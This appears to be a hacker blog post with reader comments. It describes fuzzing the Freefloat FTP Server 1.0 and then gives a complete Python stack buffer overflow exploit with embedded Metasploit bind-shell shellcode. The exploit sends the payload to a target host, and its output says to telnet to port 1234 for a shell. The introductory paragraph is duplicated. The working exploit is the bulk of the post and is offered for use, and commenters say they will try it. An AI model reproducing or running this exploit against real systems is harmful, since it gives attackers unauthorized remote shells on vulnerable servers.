First of all i fired Metasploit Fuzzer aginst this FTP server.The fuzzer worked like butter.
Near 250 bytes of Junk the program crashed and checked the yahoooooo....the offset was overwritten with metasploit pattern.
I started writing the exploit.Like always python is my best choice for writing exploits.So the exploit code is in python.
The shell code added with the exploit is windows_shell_bind_tcp.it spawns a bindshell on port 1234.
generated form Metasplot frmaework.
The bad characters are removed form the shell code using metasplot encoder.
I have published this exploit @ packet sortm security and Injector
You can find the exploit code @
http://packetstormsecurity.org/files/author/9123/
http://1337day.com/exploits/16737
Near 250 bytes of Junk the program crashed and checked the yahoooooo....the offset was overwritten with metasploit pattern.
I started writing the exploit.Like always python is my best choice for writing exploits.So the exploit code is in python.
The shell code added with the exploit is windows_shell_bind_tcp.it spawns a bindshell on port 1234.
generated form Metasplot frmaework.
The bad characters are removed form the shell code using metasplot encoder.
I have published this exploit @ packet sortm security and Injector
You can find the exploit code @
http://packetstormsecurity.org/files/author/9123/
http://1337day.com/exploits/16737
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit # Date: 21-08-2011 # Author: Debasish Mandal http://www.facebook.com/raza.whitehat # Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php # Version: 1.0 # Category:: Remote # Tested on: Windows XP SP2. #!/usr/bin/python import socket,sys from struct import pack buff = "A"* 251 junk = "A"*5 nop = "\x90"*20 eip = pack('<L',0x77F5801C) #Shell code generated by Metasploit frmaework. #Shell Code :: windows/shell/bind_tcp. #Local PORT :: 1234. #Neglected BAD CHARACTERS are "\x00","\x0a" &\x0d". shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41" "\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1" "\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77" "\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88" "\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2" "\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee" "\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5" "\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0" "\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9" "\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62" "\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3" "\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a" "\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3" "\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9" "\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88" "\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec" "\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f" "\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4" "\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10" "\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c" "\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a") buff += eip buff += nop buff += shellcode buff += junk HOST = raw_input("Enter the target host : ") PORT = raw_input("Enter the targer port (Default 21): ") print "[*] Connecting to the host "+HOST+" on port "+PORT s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((HOST, int(PORT))) print "[*]Connected to target FTP Server!" except: print "[*] FTP Server didn't respond\n" sys.exit(0) data=s.recv(1024) print "[*]Sending PAYLOAD to the target server" s.send(buff+'\r\n') print "[*]Exploit Completed..." print "[*]Now telnet to the server on port 1234" # 1337day.com [2011-08-21]
Good one...bro :) I liked it.
ReplyDeleteWill surely give it a try.
Thanks for sharing... :)
thanks man...
ReplyDelete